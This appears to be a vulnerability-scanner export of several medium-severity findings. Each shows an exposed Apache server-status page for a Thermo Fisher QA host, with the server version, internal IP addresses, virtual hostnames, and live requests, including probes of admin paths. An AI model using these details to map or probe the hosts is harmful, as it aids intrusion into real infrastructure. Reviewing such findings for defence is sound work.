/etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-0211790/706/51858_ 1.46821113528140.03.77191.26 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-068200/46/14905_ 0.3419232611645330.00.96151.25 10.253.106.226http/1.1 29-0143850/1/15136R 0.00561619064350.00.00264.47 10.253.106.203http/1.1 30-0-0/0/15129. 0.00560013821190.00.00178.60 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0144210/1/16586R 0.00561610690490.00.00258.83 10.253.106.226http/1.1 32-0256880/470/15822_ 1.3120339914054700.03.59184.95 10.253.106.203http/1.1 33-01767036481/36864/135931K 31.556057868867312.567.87274.11 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-080140/19/15161R 0.015611015982090.02.17120.24 10.253.106.203http/1.1 35-072210/39/16448_ 0.14641721421260.00.41143.71 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/api/aem-datahub/api/e_catalog/filters 36-0100150/31/15035_ 0.412117010517940.01.59151.39 10.253.106.203http/1.1 37-01030636482/36612/47902K 23.3690137203767314.666.15156.00 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0163120/136/14923_ 0.36256614222270.01.26123.67 10.253.106.226http/1.1 39-0257090/535/14317R 1.02537712968040.02.31162.94 10.253.106.226http/1.1 40-01442222/22/13953K 0.06831010736816688.26.53157.51 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0105280/12/14389_ 0.012651015544680.00.06131.01 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-068213/43/13303K 0.0725911171320612.51.10179.75 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 43-02735018/496/14537K 1.171051014058447163.961.02202.59 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-01242213/486/13485W 1.2000111730523.74.51218.99 10.253.106.226http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 45-0163150/191/12810R 0.375341114450800.00.80280.42 10.253.106.226http/1.1 46-0273510/824/14026_ 1.552361013159780.08.19193.96 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0163160/172/14016_ 0.492031012970430.00.94156.52 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 48-080150/34/11692R 0.075091011833390.00.30185.79 10.253.106.226http/1.1 49-0163200/149/13339_ 0.41
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c92c0da7d
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Tuesday, 28-May-2024 18:57:02 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 21 days 4 hours 57 minutes 13 seconds Server load: 0.00 0.00 0.00 Total accesses: 1604742 - Total Traffic: 16.6 GB - Total Duration: 126126859 CPU Usage: u33.81 s143.12 cu2518.17 cs1591.46 - .234% CPU load .876 requests/sec - 9.5 kB/second - 10.8 kB/request - 78.5963 ms/request 35 requests currently being processed, 34 idle workers R_RR_KK_R_K_____KR_R_K._RK____R_RKRRRK_._KWRRK_R__K_R___K....... _KK.._._K_K.._............_........................._..R.K...... ....._.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0147940/0/16210R 0.00358012383410.00.00130.26 10.253.106.226http/1.1 1-0198600/3/15549_ 0.0037013212620.00.02159.32 10.253.106.226http/1.1 2-0188630/30/96457R 0.06505106627610.01.18278.07 10.253.106.203http/1.1 3-0198640/6/15439R 0.0166639914880250.00.17182.97 10.253.106.203http/1.1 4-020550/955/16867_ 2.011171013191440.06.24186.39 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/admin/index.jsp HTTP/1.1 5-082824/93/16284K 0.3719490176568989.92.08206.19 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.css?v= HTTP/ 6-0195913/40/16217K 0.062580149637321.21.58429.40 10.253.106.226http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/print.min.2020.1.0.css HT 7-0143260/59/15106_ 0.31901017459620.01.28181.99 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 8-0324190/19/15310R 0.035783818800820.00.50252.37 10.253.106.226http/1.1 9-0195920/22/20362_ 0.052331111434680.00.48161.01 10.253.106.226http/1.1 10-094581/78/15228K 0.49258014932621.22.70436.06 10.253.106.203http/1.1qa1.thermofisher.in:80GET /chemicals/en/home.globalconfig.js HTTP/1.1 11-0143270/30/25236_ 0.043061212340230.00.08154.30 10.253.106.203http/1.1 12-0133940/5/15214_ 0.01901114097440.00.02270.36 10.253.106.203http/1.1 13-0195930/27/15779_ 0.141101112750130.00.69161.83 10.253.106.226http/1.1 14-0147950/0/16491_ 0.00353012627500.00.00291.42 10.253.106.203http/1.1 15-0198650/22/28333_ 0.06209614598620.01.08267.17 10.253.106.203http/1.1 16-076233/125/63955K 0.254811160915410.90.60230.18 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0109670/42/15101R 0.104131016189560.00.32156.10 10.253.106.203http/1.1 18-0147960/0/14060_ 0.00353013764040.00.00149.74 10.253.106.226http/1.1 19-036090/5/14716R 0.005371017258660.00.02331.13 10.253.106.203http/1.1 20-0195980/29/14227_ 0.03148317256550.00.34199.30 10.253.106.203http/1.1 21-0188653/45/15814K 0.131943171827524106.90.90161.58 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/handlebars/compiled/templ 22-0-0/0/16063. 0.001206013852430.00.00236.56 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0195990/20/15401_ 0.021923914308190.00.25223.06 10.253.106.226http/1.1 24-076260/58/15332R 0.154956813530000.00.48171.70 10.253.106.203http/1.1 25-0188681/12/16361K 0.08222014113092.10.34209.88 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/mobilelibs.min.2024.3.19. 26-0188690/14/15735_ 0.0827358713330040.00.21196.58 10.253.106.203http/1.1 27-0196000/18/51146_ 0.091923213076500.00.36187.46 10.253.106.203http/1.1 28-0196010/44/14282_ 0.082031111159340.04.18146.73 10.253.106.226http/1.1 29-0129510/24/14986_ 0.042341118977480.00.11263.30 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 30-040530/1/14668R 0.005784213585890.00.00175.35 10.253.106.203http/1.1 31-0188700/2/16048_ 0.00117810379300.00.01255.59 10.253.106.226http/1.1 32-040540/3/15350R 0.005661113760380.00.01181.36 10.253.106.203http/1.1 33-01767032970/33353/132420K 29.615057668460829.661.54267.78 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0198660/27/14837R 0.043951015638200.00.09115.62 10.253.106.203http/1.1 35-0173450/29/15915R 0.05505125421109070.00.25138.09 10.253.106.226http/1.1 36-0198670/18/14580R 0.02435810163400.00.05145.91 10.253.106.226http/1.1 37-01030632971/33101/44391K 21.4680137009360831.759.82149.67 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0196040/11/14686_ 0.011921114100710.00.17121.88 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/CFIDE/administrator/index.cfm HT 39-0-0/0/13763. 0.001510012683960.00.00160.54 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 40-0173490/87/13319_ 0.1315010445020.00.69148.13 10.253.106.203http/1.1 41-0188717/62/14019K 0.104710153503941.50.27129.69 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-01887213/46/13171W 0.0700170003914.70.98177.83 10.253.106.226http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 43-0124160/5/14033R 0.004951013786820.00.01141.52 10.253.106.226http/1.1 44-0124220/34/13033R 0.144351010951670.00.48214.95 10.253.106.226http/1.1 45-01887415/29/12562K 0.1821511423494582.70.62278.15 10.253.106.203http/1.1qa1.thermofisher.in:80GET /etc/designs/fishersci/clientlibs/headlibs.min.2023.3.0.css 46-0133950/2/13182_ 0.001421112714280.00.01185.63 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0188760/22/13813R 0.104351112805130.00.30155.31 10.253.106.226http/1.1 48-0198680/18/11576_ 0.02353111732780.00.71185.24 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /allergy/wo/en-us/living-with-allergies/symptom-management/ 49-0196070/39/13180_ 0.09192109710860.00.74121.28 10.253.106.203http/1.1 50-0188772/7/12861K 0.01119372137007521.80.04161.76 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /onelambda/us/en/support/rss-feed.html?error=true HTTP/1.1 51-0196080/29/12605_ 0.04371015096060.00.17223.51 10.253.106.226http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c594f2cd8
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 27-May-2024 15:40:40 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 20 days 1 hour 40 minutes 51 seconds Server load: 0.25 0.08 0.02 Total accesses: 1507150 - Total Traffic: 15.7 GB - Total Duration: 118142382 CPU Usage: u32.76 s135.21 cu2384.91 cs1512.43 - .234% CPU load .869 requests/sec - 9.5 kB/second - 10.9 kB/request - 78.3879 ms/request 36 requests currently being processed, 33 idle workers K__R_K_R___KRRK_R__.__..RRRKRK._.K_K_K__W.R.K_.K_._K..R_.KR...__ ._......_.K..K.K_.R..R_R___R_K._.R._R........................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0153532/45/15109K 0.131031111918755.60.72123.62 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-020930/110/14415_ 0.58961112496360.02.42152.20 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 2-0129200/29/95318_ 0.1277105982500.00.31261.56 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-067750/68/14570R 0.193551112421030.02.63176.21 10.253.106.226http/1.1 4-068310/115/15410_ 0.311861212188370.01.61176.34 10.253.106.203http/1.1 5-0153547/70/15284K 0.31012155603321.61.54198.51 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 6-068320/74/15243_ 0.21371214487480.00.76419.32 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0106690/76/14280R 0.315031116944150.02.67176.25 10.253.106.203http/1.1 8-0180280/70/14630_ 0.1341218252580.07.13245.43 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-069590/64/19229_ 0.14741110635390.01.12151.32 10.253.106.226http/1.1 10-0136400/8/14510_ 0.0130637914536120.00.07429.97 10.253.106.203http/1.1 11-0136474/4/24454K 0.012911119210027.70.03149.35 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /onelambda/us/en/pre-transplant/antibody-detection/_jcr_con 12-0252260/267/14011R 0.87600913168390.03.12257.90 10.253.106.226http/1.1 13-0153730/61/14790R 0.173371112270870.00.68147.62 10.253.106.203http/1.1 14-0159891/12/15252K 0.04191111898042.60.16277.75 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 15-061610/84/27412_ 0.201781112882730.03.65256.43 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-0159900/39/63124R 0.103841015020490.00.37213.83 10.253.106.226http/1.1 17-0214390/74/14309_ 0.231321014816820.00.74146.16 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 18-0136640/1/13414_ 0.002951213445270.00.00138.26 10.253.106.226http/1.1 19-0-0/0/13755. 0.002188016194230.00.00325.35 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 20-0163370/97/13573_ 0.281281016239820.03.68191.39 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 21-0130570/45/14888_ 0.191641317736530.00.66149.75 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 22-0-0/0/15260. 0.001879013387730.00.00231.25 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 23-0-0/0/14328. 0.001878013711790.00.00215.76 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 24-0130590/4/14364R 0.0135442512937080.00.03164.78 10.253.106.203http/1.1 25-0134720/47/15209R 0.153661213404770.01.05186.66 10.253.106.203http/1.1 26-0180310/44/14767R 0.126001112837890.00.33175.84 10.253.106.226http/1.1 27-0180321/97/50045K 0.373031111834472.55.62170.57 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0134730/85/13448R 0.324321210535650.00.91123.64 10.253.106.226http/1.1 29-0180339/90/14041K 0.2813510182213226.01.87236.15 10.253.106.226http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 30-0-0/0/13722. 0.002193011659240.00.00164.38 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 31-0134740/36/14946_ 0.0961029769510.01.14249.89 10.253.106.203http/1.1 32-0-0/0/14194. 0.009703012964190.00.00172.75 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 33-01767023152/23535/122602K 22.843156958342717.343.85250.09 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-0158780/230/14187_ 0.891511315250050.05.50110.07 10.253.106.226http/1.1 35-061694/115/14527K 0.33311619742768.31.42128.69 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 36-048450/122/13787_ 0.27199119675950.01.35140.50 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 37-01030623153/23283/34573K 15.5960136413342719.442.13131.98 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-093540/94/13864_ 0.462771113587080.01.58113.18 10.253.106.203http/1.1 39-0106700/84/12819_ 0.612431212094450.02.95152.01 10.253.106.226http/1.1 40-0106718/88/12258W 0.520084311410.42.29113.96 10.253.106.226http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 41-0-0/0/12946. 0.007298014228270.00.00121.80 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 42-061710/78/12465R 0.304671116574820.048.79170.80 10.253.106.226http/1.1 43-0-0/0/13595. 0.009960013509760.00.00135.42 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 44-0617210/124/12199K 0.468113104317233.64.09206.41 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 45-0112450/195/11801_ 1.002961313607600.03.02262.14 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 46-0-0/0/12236. 0.009917012154080.00.00180.27 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 47-0193929/183/12965K 0.5822112123097922.82.44147.95 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 48-078330/61/11015_ 0.18491110814410.00.63179.15 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 49-0-
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c27f169ad
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Sunday, 26-May-2024 16:04:06 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 19 days 2 hours 4 minutes 16 seconds Server load: 0.00 0.01 0.00 Total accesses: 1449796 - Total Traffic: 14.7 GB - Total Duration: 113244584 CPU Usage: u30.22 s128.71 cu2278.64 cs1452.91 - .236% CPU load .879 requests/sec - 9.4 kB/second - 10.6 kB/request - 78.1107 ms/request 38 requests currently being processed, 34 idle workers _RK..K_RK_K__.R_K.R_R_RR___KR__K_K_._KW_K__K_KK___RRR_R__KKK_RK_ ___K..RKK.._K.....................K................_..._........ K............................................................... ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0232680/148/14590_ 0.37101211419170.00.95116.82 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 1-0232730/250/13824R 0.743147311834480.03.90143.88 10.253.106.226http/1.1 2-098525/165/94733K 0.552871151100612.420.12252.68 10.253.106.203http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0-0/0/14185. 0.00280011923830.00.00169.71 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 4-0-0/0/14784. 0.006011547540.00.00161.64 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 5-0224791/29/14809K 0.06252014998300.40.26187.03 100.70.4.142http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 6-0242330/158/14704_ 0.372811213870870.01.06411.06 10.253.106.203http/1.1 7-092190/120/13897R 0.39314116426730.01.17170.19 10.253.106.203http/1.1 8-02248031/42/14094K 0.1514813174839011892.011.64209.22 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0273180/150/18735_ 0.5091110043710.01.25143.29 10.253.106.203http/1.1 10-0202601/28/13986K 0.05252013982030.40.06403.06 100.70.7.81http/1.1tfapache-corp-1-qa1.cloudqa.theGET /dispatcher/invalidate.cache HTTP/1.1 11-0255730/241/23853_ 0.802761211195490.02.53140.86 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 12-0242420/220/13538_ 0.51421212737490.00.66248.87 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 13-0-0/0/14381. 0.007011745850.00.00140.13 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 14-0224910/11/14775R 0.014961111101780.00.02232.69 10.253.106.203http/1.1 15-0232760/230/26750_ 0.733001312009030.03.56239.88 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 16-02424414/140/62644K 0.401610142962229.83.47206.92 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0-0/0/13973. 0.00281014452610.00.00142.21 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0242450/118/12985R 0.313149712987880.00.48126.67 10.253.106.203http/1.1 19-0242460/94/13140_ 0.231911315422470.00.85307.99 10.253.106.203http/1.1 20-0273190/101/13040R 0.2149665915602180.00.36181.97 10.253.106.203http/1.1 21-0258690/0/14434_ 0.009016972080.00.00139.74 10.253.106.226http/1.1 22-087630/229/14916R 0.6831411513146090.02.11225.91 10.253.106.226http/1.1 23-0299850/97/13788R 0.2249648912871980.00.55205.35 10.253.106.203http/1.1 24-087640/132/13952_ 0.312401212504010.06.05158.24 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 25-0277950/159/14693_ 0.47821212825590.01.57170.79 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 26-0317800/192/14178_ 0.512531212150910.00.67167.84 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 27-02424818/173/49509K 0.568412114069839.51.13159.70 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 28-0232780/204/12939R 0.463149810025160.04.26115.49 10.253.106.226http/1.1 29-0262490/248/13583_ 0.62331217742160.01.39230.77 10.253.106.226http/1.1 30-020170/136/13268_ 0.341521210941960.02.06120.08 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 31-021629/184/14485K 0.51561393474422.40.95217.39 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 32-0262550/244/13712_ 0.70551212334240.01.71166.49 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 33-01767014652/15035/114102K 14.669056134927039.428.54234.78 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 34-021670/136/13730_ 0.341550514771310.02.14102.23 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 35-0-0/0/14184. 0.00313018865890.00.00124.51 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 36-0258700/0/13424_ 0.00909321980.00.00134.63 10.253.106.226http/1.1 37-01030614654/14784/26074K 9.9421135844227043.326.82116.67 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /server-status?auto HTTP/1.1 38-0279478/191/13482W 0.6000132087810.99.88109.21 10.253.106.226http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 39-021680/146/12391_ 0.782261411679280.01.62146.60 10.253.106.226http/1.1www.qa.thermofisher.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 40-0279487/249/11626K 0.6711175931713.45.73105.09 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 41-0182360/76/12504_ 0.16561013710450.00.21115.21 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 42-0258710/0/12041_ 0.009016147310.00.00117.13 10.253.106.226http/1.1 43-0219602/152/13229K 0.382541213167214.51.30130.06 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 44-0279490/136/11693_ 0.42147119832090.01.30196.89 10.253.106.203http/1.1 45-0202612/82/11242K 0.162724312965824.60.23254.43 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 46-02624218/262/11785K 0.805912117028439.71.81173.46 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 47-0169830/316/12519_ 0.932821011687610.02.61142.01 10.253.106.203http/1.1 48-0258720/0/10536_ 0.009010172840.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31fed0127cfed0127c1e5c6d90
Apache Status Apache Server Status for qa1.unitylabservices.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Saturday, 25-May-2024 09:43:22 EDT Restart Time: Tuesday, 07-May-2024 13:59:49 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 17 days 19 hours 43 minutes 32 seconds Server load: 0.08 0.20 0.10 Total accesses: 1378460 - Total Traffic: 13.9 GB - Total Duration: 106877182 CPU Usage: u21.71 s106.04 cu2175.23 cs1393.18 - .24% CPU load .895 requests/sec - 9.5 kB/second - 10.6 kB/request - 77.5338 ms/request 37 requests currently being processed, 33 idle workers K_K_RK_R___R_R..K.KKK_.K._.KK_K_KK..RKKKKR._.RR_____._KR_..W._R_ _KK..RRR_..K___K.___K__._._..................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0152211/4/13829K 0.01276102010589082.30.10110.50 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 1-0127380/37/13056_ 0.262171011050530.00.88131.35 10.253.106.226http/1.1 2-01299821/78/94022K 0.17361134436407356.90.56227.53 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 3-0259740/210/13642_ 0.812725711305150.01.95164.46 10.253.106.226http/1.1 4-084240/59/14085R 0.183391010860620.00.64155.92 10.253.106.203http/1.1 5-0152577/40/14101K 0.195010142224115.20.48174.16 10.253.106.226http/1.1qa1.allergyinsider.com:80GET /shared-static/html/akamai-sureroute-test-object.html HTTP/ 6-0259780/233/14102_ 0.681481112981380.05.94404.97 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 7-0168040/211/13340R 0.79501015972110.02.68163.46 10.253.106.226http/1.1 8-0259790/160/13452_ 0.772461016690770.01.54189.64 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 9-0127390/21/18149_ 0.18255129246280.00.63135.78 10.253.106.226http/1.1 10-090850/544/13282_ 1.462861213068730.02.70391.14 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 11-0163550/0/23136R 0.00581010547880.00.00132.01 10.253.106.203http/1.1 12-028030/44/12839_ 0.22287212040220.00.78241.18 10.253.106.226http/1.1 13-0180450/229/13613R 0.50356611068070.00.84130.25 10.253.106.226http/1.1 14-0-0/0/14201. 0.002846010439950.00.00222.61 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 15-0-0/0/25981. 0.002845011074250.00.00231.26 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 16-028047/112/62065K 0.341299136339416.12.62189.58 10.253.106.203http/1.1qa1.allergyinsider.com:80GET /etc/designs/cs/brightcove/shared.min.f3691feba184d2c914fdd 17-0-0/0/13463. 0.003064013790500.00.00138.97 127.0.0.1http/1.1qa1.allergyinsider.com:80OPTIONS * HTTP/1.0 18-0156375/73/12432K 0.1720212125088014.30.22119.49 